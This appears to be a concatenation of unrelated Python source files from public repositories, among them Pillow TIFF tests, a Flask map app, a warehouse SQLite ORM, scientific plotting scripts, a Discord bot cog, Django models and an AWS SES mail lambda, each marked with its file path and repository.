self.assertEqual(im.mode, "RGB")
self.assertEqual(im.size, (278, 374))
self.assertEqual(
im.tile[0][:3], ('tiff_adobe_deflate', (0, 0, 278, 374), 0))
im.load()
def test_write_metadata(self):
""" Test metadata writing through libtiff """
img = Image.open('Tests/images/hopper_g4.tif')
f = self.tempfile('temp.tiff')
img.save(f, tiffinfo=img.tag)
loaded = Image.open(f)
original = img.tag.named()
reloaded = loaded.tag.named()
# PhotometricInterpretation is set from SAVE_INFO,
# not the original image.
ignored = [
'StripByteCounts', 'RowsPerStrip',
'PageNumber', 'PhotometricInterpretation']
for tag, value in reloaded.items():
if tag not in ignored:
if tag.endswith('Resolution'):
val = original[tag]
self.assert_almost_equal(
val[0][0]/val[0][1], value[0][0]/value[0][1],
msg="%s didn't roundtrip" % tag)
else:
self.assertEqual(
original[tag], value, "%s didn't roundtrip" % tag)
for tag, value in original.items():
if tag not in ignored:
if tag.endswith('Resolution'):
val = reloaded[tag]
self.assert_almost_equal(
val[0][0]/val[0][1], value[0][0]/value[0][1],
msg="%s didn't roundtrip" % tag)
else:
self.assertEqual(
value, reloaded[tag], "%s didn't roundtrip" % tag)
def test_g3_compression(self):
i = Image.open('Tests/images/hopper_g4_500.tif')
out = self.tempfile("temp.tif")
i.save(out, compression='group3')
reread = Image.open(out)
self.assertEqual(reread.info['compression'], 'group3')
self.assert_image_equal(reread, i)
def test_little_endian(self):
im = Image.open('Tests/images/16bit.deflate.tif')
self.assertEqual(im.getpixel((0, 0)), 480)
self.assertEqual(im.mode, 'I;16')
b = im.tobytes()
# Bytes are in image native order (little endian)
if py3:
self.assertEqual(b[0], ord(b'\xe0'))
self.assertEqual(b[1], ord(b'\x01'))
else:
self.assertEqual(b[0], b'\xe0')
self.assertEqual(b[1], b'\x01')
out = self.tempfile("temp.tif")
# out = "temp.le.tif"
im.save(out)
reread = Image.open(out)
self.assertEqual(reread.info['compression'], im.info['compression'])
self.assertEqual(reread.getpixel((0, 0)), 480)
# UNDONE - libtiff defaults to writing in native endian, so
# on big endian, we'll get back mode = 'I;16B' here.
def test_big_endian(self):
im = Image.open('Tests/images/16bit.MM.deflate.tif')
self.assertEqual(im.getpixel((0, 0)), 480)
self.assertEqual(im.mode, 'I;16B')
b = im.tobytes()
# Bytes are in image native order (big endian)
if py3:
self.assertEqual(b[0], ord(b'\x01'))
self.assertEqual(b[1], ord(b'\xe0'))
else:
self.assertEqual(b[0], b'\x01')
self.assertEqual(b[1], b'\xe0')
out = self.tempfile("temp.tif")
im.save(out)
reread = Image.open(out)
self.assertEqual(reread.info['compression'], im.info['compression'])
self.assertEqual(reread.getpixel((0, 0)), 480)
def test_g4_string_info(self):
"""Tests String data in info directory"""
file = "Tests/images/hopper_g4_500.tif"
orig = Image.open(file)
out = self.tempfile("temp.tif")
orig.tag[269] = 'temp.tif'
orig.save(out)
reread = Image.open(out)
self.assertEqual('temp.tif', reread.tag[269])
def test_12bit_rawmode(self):
""" Are we generating the same interpretation
of the image as Imagemagick is? """
TiffImagePlugin.READ_LIBTIFF = True
# Image.DEBUG = True
im = Image.open('Tests/images/12bit.cropped.tif')
im.load()
TiffImagePlugin.READ_LIBTIFF = False
# to make the target --
# convert 12bit.cropped.tif -depth 16 tmp.tif
# convert tmp.tif -evaluate RightShift 4 12in16bit2.tif
# imagemagick will auto scale so that a 12bit FFF is 16bit FFF0,
# so we need to unshift so that the integer values are the same.
im2 = Image.open('Tests/images/12in16bit.tif')
if Image.DEBUG:
print (im.getpixel((0, 0)))
print (im.getpixel((0, 1)))
print (im.getpixel((0, 2)))
print (im2.getpixel((0, 0)))
print (im2.getpixel((0, 1)))
print (im2.getpixel((0, 2)))
self.assert_image_equal(im, im2)
def test_blur(self):
# test case from irc, how to do blur on b/w image
# and save to compressed tif.
from PIL import ImageFilter
out = self.tempfile('temp.tif')
im = Image.open('Tests/images/pport_g4.tif')
im = im.convert('L')
im = im.filter(ImageFilter.GaussianBlur(4))
im.save(out, compression='tiff_adobe_deflate')
im2 = Image.open(out)
im2.load()
self.assert_image_equal(im, im2)
def test_compressions(self):
im = hopper('RGB')
out = self.tempfile('temp.tif')
for compression in ('packbits', 'tiff_lzw'):
im.save(out, compression=compression)
im2 = Image.open(out)
self.assert_image_equal(im, im2)
im.save(out, compression='jpeg')
im2 = Image.open(out)
self.assert_image_similar(im, im2, 30)
def test_cmyk_save(self):
im = hopper('CMYK')
out = self.tempfile('temp.tif')
im.save(out, compression='tiff_adobe_deflate')
im2 = Image.open(out)
self.assert_image_equal(im, im2)
def xtest_bw_compression_w_rgb(self):
""" This test passes, but when running all tests causes a failure due
to output on stderr from the error thrown by libtiff. We need to
capture that but not now"""
im = hopper('RGB')
out = self.tempfile('temp.tif')
self.assertRaises(
IOError, lambda: im.save(out, compression='tiff_ccitt'))
self.assertRaises(IOError, lambda: im.save(out, compression='group3'))
self.assertRaises(IOError, lambda: im.save(out, compression='group4'))
def test_fp_leak(self):
im = Image.open("Tests/images/hopper_g4_500.tif")
fn = im.fp.fileno()
os.fstat(fn)
im.load() # this should close it.
self.assertRaises(OSError, lambda: os.fstat(fn))
im = None # this should force even more closed.
self.assertRaises(OSError, lambda: os.fstat(fn))
self.assertRaises(OSError, lambda: os.close(fn))
def test_multipage(self):
# issue #862
TiffImagePlugin.READ_LIBTIFF = True
im = Image.open('Tests/images/multipage.tiff')
# file is a multipage tiff, 10x10 green, 10x10 red, 20x20 blue
im.seek(0)
self.assertEqual(im.size, (10, 10))
self.assertEqual(im.convert('RGB').getpixel((0, 0)), (0, 128, 0))
self.assertTrue(im.tag.next)
im.seek(1)
self.assertEqual(im.size, (10, 10))
self.assertEqual(im.convert('RGB').getpixel((0, 0)), (255, 0, 0))
self.assertTrue(im.tag.next)
im.seek(2)
self.assertFalse(im.tag.next)
self.assertEqual(im.size, (20, 20))
self.assertEqual(im.convert('RGB').getpixel((0, 0)), (0, 0, 255))
TiffImagePlugin.READ_LIBTIFF = False
def test__next(self):
TiffImagePlugin.READ_LIBTIFF = True
im = Image.open('Tests/images/hopper.tif')
self.assertFalse(im.tag.next)
im.load()
self.assertFalse(im.tag.next)
def test_4bit(self):
# Arrange
test_file = "Tests/images/hopper_gray_4bpp.tif"
original = hopper("L")
# Act
TiffImagePlugin.READ_LIBTIFF = True
im = Image.open(test_file)
TiffImagePlugin.READ_LIBTIFF = False
# Assert
self.assertEqual(im.size, (128, 128))
self.assertEqual(im.mode, "L")
self.assert_image_similar(im, original, 7.3)
def test_save_bytesio(self):
# PR 1011
# Test TIFF saving to io.BytesIO() object.
TiffImagePlugin.WRITE_LIBTIFF = True
TiffImagePlugin.READ_LIBTIFF = True
# Generate test image
pilim = hopper()
def save_bytesio(compression=None):
buffer_io = io.BytesIO()
pilim.save(buffer_io, format="tiff", compression=compression)
buffer_io.seek(0)
pilim_load = Image.open(buffer_io)
self.assert_image_similar(pilim, pilim_load, 0)
# save_bytesio()
save_bytesio('raw')
save_bytesio("packbits")
save_bytesio("tiff_lzw")
TiffImagePlugin.WRITE_LIBTIFF = False
TiffImagePlugin.READ_LIBTIFF = False
if __name__ == '__main__':
unittest.main()
# End of file
| 1.6875 | 2 |
kontaktmap.py | muellermartin/kontaktmap | 0 | 12797256 | import os
from flask import Flask, render_template, request, json
app = Flask(__name__)
@app.route('/')
def index():
return render_template('index.html')
@app.route('/save', methods=['POST'])
def save():
with open('data.json', 'w+') as f:
f.write(json.dumps(request.get_json()))
return ''
@app.route('/load')
def load():
result = '{ "markers": [] }'
if os.path.isfile('data.json'):
with open('data.json', 'r') as f:
result = f.read()
return json.jsonify(result)
if __name__ == '__main__':
app.run()
| 1.429688 | 1 |
elasticlog/customlogger.py | gustavohenrique/elasticlog | 1 | 12797264 | # coding: utf-8
import sys
import logging
import settings
logFormatter = logging.Formatter('%(asctime)s [%(levelname)-5.5s] %(message)s')
logger = logging.getLogger()
fileHandler = logging.FileHandler('{0}'.format(settings.LOG_FILE_PATH))
fileHandler.setFormatter(logFormatter)
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler(sys.stdout)
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler) | 1.234375 | 1 |
blaze/command/replay.py | henry1jin/alohamora | 5 | 12797272 | """ Implements the commands for viewing and manipulating the training manifest """
import json
import time
import os
from blaze.action import Policy
from blaze.logger import logger as log
from blaze.mahimahi.server import start_server
from . import command
@command.argument("replay_dir", help="The directory containing the save files captured by mahimahi")
@command.argument("--policy", help="The file path to a JSON-formatted push policy to serve")
@command.argument("--cert_path", help="Location of the server certificate")
@command.argument("--key_path", help="Location of the server key")
@command.argument(
"--cache_time", help="Do not cache objects which expire in less than this time (in seconds)", type=int, default=None
)
@command.argument(
"--extract_critical_requests",
help="true or false to specify if server should inject critical request extractor",
action="store_true",
)
@command.command
def replay(args):
"""
Starts a replay environment for the given replay directory, including setting up interfaces, running
a DNS server, and configuring and running an nginx server to serve the requests
"""
policy = None
cert_path = os.path.abspath(args.cert_path) if args.cert_path else None
key_path = os.path.abspath(args.key_path) if args.key_path else None
if args.policy:
log.debug("reading policy", push_policy=args.policy)
with open(args.policy, "r") as policy_file:
policy_dict = json.load(policy_file)
policy = Policy.from_dict(policy_dict)
with start_server(
args.replay_dir,
cert_path,
key_path,
policy,
cache_time=args.cache_time,
extract_critical_requests=args.extract_critical_requests,
):
while True:
time.sleep(86400)
| 1.5625 | 2 |
backend/src/models/Warehouse.py | ahmedsalahacc/Inventory-Management-System | 0 | 12797280 | <filename>backend/src/models/Warehouse.py
from models import BaseModel, gen_id
class WarehouseModel(BaseModel):
'''
ORM for Warehouse table with the following structure
warehouse(
id CHARACTER(10) NOT NULL PRIMARY KEY,
name TEXT NOT NULL,
location TEXT NOT NULL
);
'''
def __init__(self, db_filename: str):
super(WarehouseModel, self).__init__(db_filename)
def insert(self, data_tuple: tuple):
'''
Inserts a new record in warehouse table
Parameters
----------
data_tuple: tuple
tuple of values (name, location)
'''
# aquiring cursor
cursor = self.conn.cursor()
# sql script
sql_script = '''
INSERT INTO warehouse VALUES (?, ?, ?)
'''
# executing script
id = gen_id()
data_tuple = (id, *data_tuple)
cursor.execute(sql_script, data_tuple)
self.conn.commit()
# conceding cursor
cursor.close()
return id
def delete(self, id: str):
'''
Deletes a record from warehouse table
Parameters
----------
id: str
'''
# aquiring cursor
cursor = self.conn.cursor()
# sql script
sql_script = '''
DELETE FROM warehouse WHERE id = ?
'''
# executing script
cursor.execute(sql_script, (id,))
self.conn.commit()
# conceding cursor
cursor.close()
def update(self, id: str, new_data: tuple):
'''
Updates a record of the warehouse table using id
Parameters
----------
id: str
id of the record in the db
data_tuple: tuple
tuple of new values (name, location)
'''
# aquiring cursor
cursor = self.conn.cursor()
# sql script
sql_script = '''
UPDATE warehouse
SET name = ? ,
location = ?
WHERE id = ?
'''
# executing script
new_data = (*new_data, id)
cursor.execute(sql_script, new_data)
self.conn.commit()
# conceding cursor
cursor.close()
def getByID(self, id: str):
'''
gets a record from the warehouse table using id
Parameters
----------
id: str
id of the record in the db
Returns
-------
query: tuple
represents the result
'''
# aquiring cursor
cursor = self.conn.cursor()
# sql script
sql_script = '''
SELECT * FROM warehouse WHERE id = ?
'''
# executing script
cursor.execute(sql_script, (id,))
query = cursor.fetchone()
# conceding cursor
cursor.close()
return query
def getAll(self, order: str = 'ASC'):
'''
gets a record from the warehouse table using id
Parameters
----------
order: str Default = 'asc'
arrangement of the returned query
ASC: ascending order
DESC: descending order
Returns
-------
query: list
results list
'''
# aquiring cursor
cursor = self.conn.cursor()
# sql script
sql_script = f'''
SELECT * FROM warehouse ORDER BY name {order}
'''
# executing script
cursor.execute(sql_script)
query = cursor.fetchall()
# conceding cursor
cursor.close()
return query
| 1.476563 | 1 |
xps_convert/read/xmp_parser.py | InternetUnexplorer/XPSConvert | 0 | 12797288 | import re
from typing import Iterator
from xps_convert.read.errors import ParseError
from xps_convert.read.xmp import Xmp
FIELD_RE = re.compile(r"([\w\s]+):\s(.*)")
def parse_xmp(filename: str, lines: Iterator[str]) -> Xmp:
xmp = Xmp()
# First line is always a comment, skip it
next(lines)
# Match each line and enumerate (line numbers are needed for errors)
for n, match in enumerate((FIELD_RE.match(line) for line in lines)):
if match is not None:
xmp.values[match.group(1)] = match.group(2)
else:
raise ParseError("unable to parse line", filename, n)
# Verify that required fields are present
for field in ("MHS File", "Device", "Package", "SpeedGrade"):
if field not in xmp.values:
raise ParseError(f"missing required field ‘{field}’", filename)
return xmp
| 1.765625 | 2 |
model/user_in_group.py | Belyanova/Python_-training | 0 | 12797296 | class UserGroup:
def __init__(self, id=None, group_id=None,):
self.group_id = group_id
self.id = id | 0.90625 | 1 |
plot_bathymetry.py | sustain-lab/multibeam-em712 | 0 | 12797304 | import glob
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import numpy as np
import xarray as xr
from mpl_toolkits.basemap import Basemap
import gc
import matplotlib
matplotlib.rc('font', size=12)
data_path = 'processed_netcdf'
multibeam_files = glob.glob(data_path + '/*.nc')
multibeam_files.sort()
lon0, lon1 = -122.2, -121.7
lat0, lat1 = 36.6, 37.
parallels = np.arange(lat0, lat1 + 0.1, 0.1)
meridians = np.arange(lon0, lon1 + 0.1, 0.1)
fig = plt.figure(figsize=(8, 6))
map = Basemap(llcrnrlon=lon0, llcrnrlat=lat0, urcrnrlon=lon1, urcrnrlat=lat1, \
resolution='f')
map.drawcoastlines()
map.drawparallels(parallels, labels=~np.isnan(parallels))
map.drawmeridians(meridians, labels=~np.isnan(meridians))
skip = 4
for f in multibeam_files:
print('Plotting ', f)
ds = xr.open_dataset(f)
lon = np.array(ds.longitude[::skip,::skip])
lat = np.array(ds.latitude[::skip,::skip])
depth = np.array(ds.depth[::skip,::skip])
plt.pcolor(lon, lat, depth, vmin=0, vmax=100, cmap=cm.viridis_r)
del lon, lat, depth, ds
gc.collect()
plt.colorbar()
fig.suptitle('Monterey Bay bathymetry from shipboard Multibeam EM-712')
plt.savefig('monterey_bay_multibeam_bathymetry.png', dpi=300)
plt.close(fig)
| 1.820313 | 2 |
tests/test_utilities.py | mhostetter/quaternionic | 40 | 12797312 | import sys
import numpy as np
import quaternionic
import pytest
def test_self_return():
def f1(a, b, c):
d = np.asarray(a).copy()
assert isinstance(a, np.ndarray) and isinstance(a, quaternionic.array)
assert isinstance(b, np.ndarray) and isinstance(b, quaternionic.array)
assert isinstance(c, np.ndarray) and isinstance(c, quaternionic.array)
assert isinstance(d, np.ndarray) and not isinstance(d, quaternionic.array)
return d
a = quaternionic.array.random((17, 3, 4))
b = quaternionic.array.random((13, 3, 4))
c = quaternionic.array.random((11, 3, 4))
d1 = f1(a, b, c)
assert isinstance(d1, np.ndarray) and not isinstance(d1, quaternionic.array)
f2 = quaternionic.utilities.type_self_return(f1)
d2 = f2(a, b, c)
assert isinstance(d2, np.ndarray) and isinstance(d2, quaternionic.array)
f1.nin = 3
f3 = quaternionic.utilities.type_self_return(f1)
d3 = f3(a, b, c)
assert isinstance(d3, np.ndarray) and isinstance(d3, quaternionic.array)
def test_ndarray_args():
def f1(a, b, c):
d = np.asarray(a).copy()
assert isinstance(a, np.ndarray) and not isinstance(a, quaternionic.array)
assert isinstance(b, np.ndarray) and not isinstance(b, quaternionic.array)
assert isinstance(c, np.ndarray) and not isinstance(c, quaternionic.array)
assert isinstance(d, np.ndarray) and not isinstance(d, quaternionic.array)
return d
a = quaternionic.array.random((17, 3, 4))
b = quaternionic.array.random((13, 3, 4))
c = quaternionic.array.random((11, 3, 4))
f2 = quaternionic.utilities.ndarray_args(f1)
d2 = f2(a, b, c)
assert isinstance(d2, np.ndarray) and not isinstance(d2, quaternionic.array)
f1.nin = 3
f3 = quaternionic.utilities.ndarray_args(f1)
d3 = f3(a, b, c)
assert isinstance(d3, np.ndarray) and not isinstance(d3, quaternionic.array)
def test_ndarray_args_and_return():
def f1(a, b, c):
d = np.asarray(a).copy()
assert isinstance(a, np.ndarray) and not isinstance(a, quaternionic.array)
assert isinstance(b, np.ndarray) and not isinstance(b, quaternionic.array)
assert isinstance(c, np.ndarray) and not isinstance(c, quaternionic.array)
assert isinstance(d, np.ndarray) and not isinstance(d, quaternionic.array)
return d
a = quaternionic.array.random((17, 3, 4))
b = quaternionic.array.random((13, 3, 4))
c = quaternionic.array.random((11, 3, 4))
f2 = quaternionic.utilities.ndarray_args_and_return(f1)
d2 = f2(a, b, c)
assert isinstance(d2, np.ndarray) and isinstance(d2, quaternionic.array)
f1.nin = 3
f3 = quaternionic.utilities.ndarray_args_and_return(f1)
d3 = f3(a, b, c)
assert isinstance(d3, np.ndarray) and isinstance(d3, quaternionic.array)
@pytest.mark.skipif(sys.implementation.name.lower() == 'pypy', reason="No numba on pypy")
def test_types_to_ftylist():
import numba
types_to_ftylist = quaternionic.utilities.convert_numpy_ufunc_type_to_numba_ftylist
types = '?bhilqpBHILQPfdgF->D'
ftylist = numba.complex128(
numba.boolean,
numba.byte,
numba.short,
numba.intc,
numba.int_,
numba.longlong,
numba.intp,
numba.char,
numba.ushort,
numba.uintc,
numba.uint,
numba.ulonglong,
numba.uintp,
numba.float32,
numba.float_,
numba.double,
numba.complex64,
)
assert types_to_ftylist([types]) == [ftylist]
def test_pyguvectorize():
_quaternion_resolution = 10 * np.finfo(float).resolution
np.random.seed(1234)
one = quaternionic.array(1, 0, 0, 0)
x = quaternionic.array.random((7, 13, 4))
y = quaternionic.array.random((13, 4))
z = np.random.rand(13)
arg0s = [one, -(1+2*_quaternion_resolution)*one, -one, x]
for k in dir(quaternionic.algebra_ufuncs):
if not k.startswith('__'):
f1 = getattr(quaternionic.algebra_ufuncs, k)
f2 = getattr(quaternionic.algebra, k)
sig = f2.signature
inputs = sig.split('->')[0].split(',')
for arg0 in arg0s:
args = [arg0.ndarray] if inputs[0] == '(n)' else [z,]
if len(inputs) > 1:
args.append(y.ndarray if inputs[1] == '(n)' else z)
assert np.allclose(
f1(*args),
quaternionic.utilities.pyguvectorize(f2.types, f2.signature)(f2)(*args),
atol=0.0,
rtol=_quaternion_resolution
)
| 1.40625 | 1 |
cogs/onload.py | paulranshaw/Discord-Bot | 0 | 12797320 | <filename>cogs/onload.py<gh_stars>0
import discord
import os
from discord.errors import ClientException
import dotenv
import logging
import asyncio
from discord.ext import commands, tasks
from dotenv import load_dotenv
from itertools import cycle
client = discord.Client()
class Onload(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_ready(self):
print('Bot is online.')
def setup(client):
client.add_cog(Onload(client)) | 1.515625 | 2 |
service/models.py | YuraPogorelov/auto-blog-pyhon | 0 | 12797328 | <gh_stars>0
from django.db import models
from django.urls import reverse
# Create your models here.
class Category(models.Model):
"""Кактегория услуг"""
name = models.CharField('Название категории', max_length=120)
slug = models.SlugField('URL', max_length=120)
text = models.TextField('Текст категории')
banner = models.ImageField('Баннер', upload_to='images/', blank=True, null=True)
title = models.CharField('Title', max_length=120)
description = models.CharField('Description', max_length=120)
keywords = models.CharField('Keywords', max_length=250)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('service_category', kwargs={'slug': self.slug})
class Meta:
verbose_name = 'Категория'
verbose_name_plural = 'Категории'
class Model(models.Model):
"""Модель из категории"""
category = models.ForeignKey(Category, on_delete=models.SET_NULL, null=True, verbose_name='Выбор категории')
name = models.CharField('Название услуги', max_length=120)
slug = models.SlugField('URL', max_length=120, default='', unique=True)
text = models.TextField('Текст модели', default='')
header = models.CharField('Заголовок', max_length=240, blank=True, null=True)
sub_header = models.CharField('Подзаголовок', max_length=240, blank=True, null=True)
images = models.ImageField('Картинка техники', upload_to='images/', blank=True, null=True)
active = models.BooleanField('Опубликовать', default=True)
title = models.CharField('Title', max_length=120)
description = models.CharField('Description', max_length=120)
keywords = models.CharField('Keywords', max_length=250)
sort = models.PositiveIntegerField('Порядок', default=0, unique=True)
banner = models.ImageField('Баннер', upload_to='images/', blank=True, null=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('service_model_view', kwargs={'category': self.category.slug, 'slug': self.slug})
class Meta:
verbose_name = 'Модель'
verbose_name_plural = 'Модели' | 1.304688 | 1 |
.projectsAg/model/mail.py | Hraesvel/portfolioSite_flutter | 0 | 12797336 | <reponame>Hraesvel/portfolioSite_flutter
import json
import os
import boto3
from botocore.exceptions import ClientError
# from email.mime.multipart import MIMEMultipart
# from email.mime.text import MIMEText
# from email.mime.application import MIMEApplication
region = os.environ['Region']
def send_mail(msg):
client_ses = boto3.client('ses', region)
try:
verify = client_ses.verify_email_address(EmailAddress=msg)
response = client_ses.send_email(
Source='<EMAIL>',
Destination={
'ToAddresses': [],
'CcAddresses': [],
'BccAddresses': []
},
Message={
'Subject': {'Data': f"from {msg['reply_address']}"},
'Body': {'Text': {'Data': msg['body']}}},
ReplyToAddresses=[msg['reply_address']],
)
except ClientError as e:
output = e.response['Error']['Message']
else:
output = "Email sent! Message ID: " + response['MessageId']
return output
def lambda_handler(event, context):
# print(event)
# print(event['reply_address'])
print(send_mail(event))
return {
'statusCode': 200,
'body': json.dumps('Hello from Lambda!')
}
| 1.5 | 2 |
PythonAndOop/N39_method_overloading_3.py | jiauy/before_work | 0 | 12797344 | class MyList(list):
def __getitem__(self, index):
if index == 0:
raise IndexError
if index > 0:
index -= 1
return list.__getitem__(self, index)
def __setitem__(self, index, value):
if index == 0:
raise IndexError
if index > 0:
index -= 1
list.__setitem__(self, index, value)
if __name__ == '__main__':
x = MyList(['a', 'b', 'c'])
print(x)
print("-" * 10)
x.append('d')
print(x)
print("-" * 10)
x.__setitem__(4, 'e')
print(x)
print("-" * 10)
print(x[1])
print(x.__getitem__(1))
print("-" * 10)
print(x[4])
print(x.__getitem__(4)) | 2.515625 | 3 |
results texture.py | wr0gers/PixelMiner | 0 | 12797352 | <filename>results texture.py
import os
import re
import numpy as np
import matplotlib.pyplot as plt
from ccc import concordance_correlation_coefficient
from scipy.stats import wilcoxon, ttest_rel, ttest_ind, mannwhitneyu, ranksums
from scipy.stats import f, shapiro, bartlett, f_oneway, kruskal
from statsmodels.stats.weightstats import ztest
from scipy.stats import binom_test
from radiomics import featureextractor, getTestCase
import SimpleITK as sitk
import pandas as pd
from random import randint
from tqdm import tqdm
from PIL import Image, ImageOps, ImageEnhance
#from sklearn.model_selection import train_test_split
from sklearn.feature_extraction import image
import matplotlib.pyplot as plt
from functools import partial
from get_features_functions import get_features, final, get_results, display_results
from get_features_functions import listfiles, unnormalize, get_all_features
from get_features_functions import rmses, wilcoxons, ttests, para_non_para
from get_features_functions import get_all_features, get_rmses, normalize
def unnormalize(img):
img += 1
img /= 2
img *= (1024 + 3071)
#img -= 1024
#img *= 255
img = img.astype(np.uint8)
print(img.min(), img.max())
return img
def normalize(a):
b = (a - np.min(a))/np.ptp(a)
return b
def rse(x, y):
diff = x - y
sqrd = diff ** 2
sqrt = np.sqrt(sqrd)
return sqrt
n = 0
path = r'H:\Data\W'
files = os.listdir(path)
print(files[14])
arr1 = np.load(os.path.join(path, files[14]))
arr1 = unnormalize(arr1)
print(arr1.dtype, arr1.min(), arr1.max())
print(files[8])
arr2 = np.load(os.path.join(path, files[8]))
features = get_features(arr1, arr2)
features = [key for key in features.keys() if key.find('diagnostic') < 0]
features = [feature[9:] for feature in features]
features = [re.sub(r"(\w)([A-Z])", r"\1 \2", feature) for feature in features]
features = [feature.split('_') for feature in features]
features = np.array(features)
lung_itp = {}
lung_tru = get_all_features(path, 'tru_one', 'lung')
lung_cnn = get_all_features(path, 'PixelCNN', 'lung')
lung_itp['Linear'] = get_all_features(path, 'Linear', 'lung')
lung_itp['BSpline'] = get_all_features(path, 'BSpline', 'lung')
lung_itp['Cosine'] = get_all_features(path, 'Cosine', 'lung')
lung_itp['Nearest'] = get_all_features(path, 'Nearest', 'lung')
lung_results = get_results(lung_tru, lung_cnn, lung_itp)
display_results(lung_results, features)
cnn_diff = rse(lung_tru, lung_cnn)
lin_diff = rse(lung_tru, lung_itp['Linear'])
cos_diff = rse(lung_tru, lung_itp['Cosine'])
ner_diff = rse(lung_tru, lung_itp['Nearest'])
bsp_diff = rse(lung_tru, lung_itp['BSpline'])
t = cnn_diff.shape[0] * cnn_diff.shape[1]
print()
print('Percent Greater:')
print('Linear\t\t\t Win Sinc\t\t\t Nearest\t\t\t BSpline\t\t\t PixelMiner')
print('\t-\t\t\t' , (lin_diff < cos_diff).sum() / t, (lin_diff < ner_diff).sum() / t, (lin_diff < bsp_diff).sum() / t, (lin_diff < cnn_diff).sum() / t)
print((cos_diff < lin_diff).sum() / t, '\t-\t\t\t' , (cos_diff < ner_diff).sum() / t, (cos_diff < bsp_diff).sum() / t, (cos_diff < cnn_diff).sum() / t)
print((ner_diff < lin_diff).sum() / t, (ner_diff < cos_diff).sum() / t, '\t-\t\t\t' , (ner_diff < bsp_diff).sum() / t, (ner_diff < cnn_diff).sum() / t)
print((bsp_diff < lin_diff).sum() / t, (bsp_diff < cos_diff).sum() / t, (bsp_diff < ner_diff).sum() / t, '\t-\t\t\t' , (bsp_diff < cnn_diff).sum() / t)
print((cnn_diff < lin_diff).sum() / t, (cnn_diff < cos_diff).sum() / t, (cnn_diff < ner_diff).sum() / t, (cnn_diff < bsp_diff).sum() / t, '\t-\t\t' )
error = np.array([cnn_diff, lin_diff, cos_diff, ner_diff, bsp_diff])
n_error = np.zeros((5, 50, 51))
for i in range(error.shape[-1]):
n_error[:, :, i] = normalize(error[:, :, i])
print()
print('NRMSE Mean:')
print('PixelMiner:', n_error[0].mean())
print('Linear:', n_error[1].mean())
print('Win Sinc:', n_error[2].mean())
print('Nearest:', n_error[3].mean())
print('BSpline', n_error[4].mean())
print()
print('NRMSE STD:')
print('PixelMiner:', n_error[0].std())
print('Linear:', n_error[1].std())
print('Win Sinc:', n_error[2].std())
print('Nearest:', n_error[3].std())
print('BSpline', n_error[4].std())
ccc_cnn = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_cnn[:, i]) for i in range(lung_tru.shape[1])])
ccc_lin = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['Linear'][:, i]) for i in range(lung_tru.shape[1])])
ccc_bsp = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['BSpline'][:, i]) for i in range(lung_tru.shape[1])])
ccc_ws = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['Cosine'][:, i]) for i in range(lung_tru.shape[1])])
ccc_nn = np.array([concordance_correlation_coefficient(lung_tru[:, i], lung_itp['Nearest'][:, i]) for i in range(lung_tru.shape[1])])
cccs = np.vstack((ccc_cnn, ccc_bsp, ccc_nn, ccc_ws, ccc_lin))
print('Mean CCC')
print('PixelMiner', cccs[0].mean(), '\n'
'Win Sinc', cccs[3].mean(), '\n'
'BSpline', cccs[1].mean(), '\n'
'Nearest', cccs[2].mean(), '\n'
'Linear', cccs[4].mean())
print()
print('Reproducibility')
thresh = .85
print('PixelMiner', (cccs[0] > thresh).sum() / 51, '\n'
'Win Sinc', (cccs[3] > thresh).sum() / 51, '\n'
'BSpline', (cccs[1] > thresh).sum() / 51, '\n'
'Nearest', (cccs[2] > thresh).sum() / 51, '\n'
'Linear', (cccs[4] > thresh).sum() / 51)
print('Wilcoxons:')
print('Win Sinc:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 2, :].flatten()))
print('Linear:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 1, :].flatten()))
print('BSpline:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 4, :].flatten()))
print('Nearest:', wilcoxon(n_error[:, 0, :].flatten(), n_error[:, 3, :].flatten()))
shape = n_error.shape[0] * n_error.shape[2]
print('Binomial test:')
print('Win Sinc:', binom_test((n_error[:, 0, :] < n_error[:, 2, :]).sum() , shape))
print('Linear:', binom_test((n_error[:, 0, :] < n_error[:, 1, :]).sum() , shape))
print('BSpline:', binom_test((n_error[:, 0, :] < n_error[:, 4, :]).sum() , shape))
print('Nearest:', binom_test((n_error[:, 0, :] < n_error[:, 3, :]).sum() , shape))
| 1.65625 | 2 |
udacity/deep-learning/assignments/notmnist.py | balazssimon/ml-playground | 0 | 12797360 | # These are all the modules we'll be using later. Make sure you can import them
# before proceeding further.
# code changed to Python3
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
import os
import sys
import tarfile
from IPython.display import display, Image
from scipy import ndimage
from sklearn.linear_model import LogisticRegression
from sklearn.metrics.pairwise import cosine_similarity
from urllib.request import urlretrieve
import pickle
import IPython
# Config the matlotlib backend as plotting inline in IPython
# %matplotlib inline
url = 'http://commondatastorage.googleapis.com/books1000/'
last_percent_reported = None
def download_progress_hook(count, blockSize, totalSize):
"""A hook to report the progress of a download. This is mostly intended for users with
slow internet connections. Reports every 1% change in download progress.
"""
global last_percent_reported
percent = int(count * blockSize * 100 / totalSize)
if last_percent_reported != percent:
if percent % 5 == 0:
sys.stdout.write("%s%%" % percent)
sys.stdout.flush()
else:
sys.stdout.write(".")
sys.stdout.flush()
last_percent_reported = percent
def maybe_download(filename, expected_bytes, force=False):
"""Download a file if not present, and make sure it's the right size."""
if force or not os.path.exists(filename):
print('Attempting to download:', filename)
filename, _ = urlretrieve(url + filename, filename, reporthook=download_progress_hook)
print('\nDownload Complete!')
statinfo = os.stat(filename)
if statinfo.st_size == expected_bytes:
print('Found and verified', filename)
else:
raise Exception(
'Failed to verify ' + filename + '. Can you get to it with a browser?')
return filename
train_filename = maybe_download('notMNIST_large.tar.gz', 247336696)
test_filename = maybe_download('notMNIST_small.tar.gz', 8458043)
num_classes = 10
np.random.seed(133)
def maybe_extract(filename, force=False):
root = os.path.splitext(os.path.splitext(filename)[0])[0] # remove .tar.gz
if os.path.isdir(root) and not force:
# You may override by setting force=True.
